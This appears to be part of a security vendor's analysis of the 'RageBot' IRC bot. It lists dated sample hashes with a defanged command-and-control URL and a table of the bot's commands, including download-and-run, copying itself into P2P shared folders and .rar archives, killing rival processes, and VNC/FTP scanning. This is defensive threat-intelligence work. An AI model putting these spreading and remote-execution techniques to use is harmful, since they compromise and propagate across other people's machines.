Jan-15 220188F1BD2E10BA0751383EA0946DBA api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 2DB9BD0ABD99F3285721D358A6816737 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 EBEB072B8336F5FD35328227A60B271C api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 01303BEFE5938C3C748C4E058A8A6AE9 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 82E2CA09BDEB3ABF8B70D848F66793E7 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 0B2E7AE8DF2ADA1E86A3A25FC248C6FE api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 430560EBD3BE6A680BFA6409F332585B api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 F79AF05D9B43F99EB6FC64DA2C129F67 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 384252746FAFF8D264E6A8CA450B6301 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 C9636239ED698834CABA78E1F9F8DB0F api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 9C42746376CC7D265D6BF554B960EDE2 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 67B08BF0F2C89DE4E0D1C36BAF7193B9 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 735B6602B4BD1D71246F43642D6873AA api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 7D9AF61AE962443D586BFC8A86100B5F api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 05ABC48A4BEE624D7952954CF14F699D api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 FF638ACA7D8D10ED8AD2DE1BC333123D api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 AA4085182E8F10FEC8EBC3F6D3612321 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 1A54593E7C82DD1B16B7626FCB211DA1 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 235E67A88907DA68BFBB9264A00A31E3 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 2CBD9428DEE885C30258BF0C38299138 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 CCDC5EC2085536160813658BE549F0B6 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 CBD732F87901EE03820DBA41D0D2895A api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 BE5E43F2786D628B7AA8689C2108247D api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 5AEC4A3B3E0AEB3B13B98086FC81D797 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 6034814DB1C25A092C39F251F29B2216 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 6CAE0B51E5EAD86EEA47C4068287650A api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 451E324D3CB601E00FA041D6FDE1C4EC api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 9AEB3A097F11887D89EC08D337814B6B api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 8F9F97232DBE283BC5E7B6AB4DD580B8 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 F57A08679380F3FDFD369528FE5CE854 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 F24BC22CFD12E3FDE40D06BF54F35CF1 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 4BB4C19B5FC2401D45845789CC761577 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 583432D95424EC051AFE9E621DC41ACA api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 C5756AC3FE61266D326B43E904BC1A6C api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 44012367D7FFA7845B59462952AB9014 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 FC506F023FF71E3ACDEE4449C43E5F1B api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 322E11B552B897ADBC9ABCE51774988E api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 EC0832E5818E4CD753C4B2675C6179A1 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 63C37B2FEB0C0F71568B9771AC4DACE4 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 7BE4749D1D1F8950F7288C67A393B7F0 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 ADDF9E2B207AD9E89DB46E81A8121882 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 3E70DB4E5F5F60F2FDE7AEC38F4B30CD api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 268301147BC53722A898E1F38E6F026D api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 309FB15C08861BC063C19C326A29AC98 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 422C1A2BC53F72CAE5435F7F5598BDFD api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 30A6C9DC574075C5EA47F17EA9392C47 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 37A9570400CB0C0CD4E5273AE3232EB5 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 E59BCA5EE865FE5789C96B20A43F9207 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 919C861E6A6ABF88045476D5D92A5DE1 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 5FD98DE177F158C31960BF80272F2535 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 9439AA18598643131B3F8DD9E69AB294 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 F66A06166B73391C4C7A7A58CC6CE66C api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 79589FC33375A63BB44A8DE0B2B5DAF8 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 2C328EF3F2074D68729F329D4B2F8013 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 90E8FF73C7E78B99ABCD1FC22394F22E api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 A3AEC401831AF6EF1C75AFB1C50D96DA api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 42C7C8719D33AFCF36DC7D5D2594EB5B api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 375E51758336183B07CA7DBF771D2EF8 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 FA20E413002E17B938B2451552721027 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 09840FA1887528B20C98C408C8EB6E07 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 6AB2975E77EA4724FADF4CCB7250F0E9 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 51E7E34FFB5EF17FDE5FAFC5DF8F7212 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 F61E3F5ACFE1F861CECEA0A793D4F333 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 229236B39E92E629178419CB8A529E1A api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 D299AD2A61F325F5DA56AE7674D2F77D api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 53CA20232F358A9C256748403451EF14 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 41BE96D1B3BDF9E48D97AE153D6EFD45 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 213E0B42AF7CF1D0DCB75E378CA93512 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif

RageBot Commands

Command Description
PING Check status
422 Check status
433 Redefine nick name
-s Silent mode
h 0f6969d7052da9261e31ddb6e88c136e Uninstall bot.
h fd456406745d816a45cae554c788e754 Download and run file
Botinfo Sends botinfo
p2p Starts p2p spread, Copy itself into following location-
\Program Files\LimeWire\Shared
\Program Files\eDonkey2000\incoming
\Program Files\KAZAA
\Program Files\Morpheus\My Shared Folder\
\Program Files\BearShare\Shared\
\Program Files\ICQ\Shared Files\
\Program Files\Grokster\My Grokster\
\My Downloads\
commands Sends following list of commands
commands: botinfo/rarworm/xpl/p2p/vncstop/disconnect/reconnect/nick/restart/part/join/
rarworm Scan for .rar files and copy itself into .rar archives with name as ?self-installer.exe?
disconnect Disconnect itself
b0tk1ller (off) Starts a thread that scans for the running processes and terminate the process if process name matched with hardcoded process names.
If parameter off is provided it stops the bot killer thread.
reconnect Reconnects to the same server
reconnect.next Same as reconnect since there is only one ip hardcoded in the bot.
nick (nickname) Sets nick name if nickname not provided that generates random nickname
restart Restarts itself
vncstop Stop VNC scanning threads.
join (channel_name) Join mentioned channel
xpl Starts vnc and ftp scanning threads.

Analysis by: Amandeep Kumar, Avinash Kumar, Nirmal Singh & Deepen Desai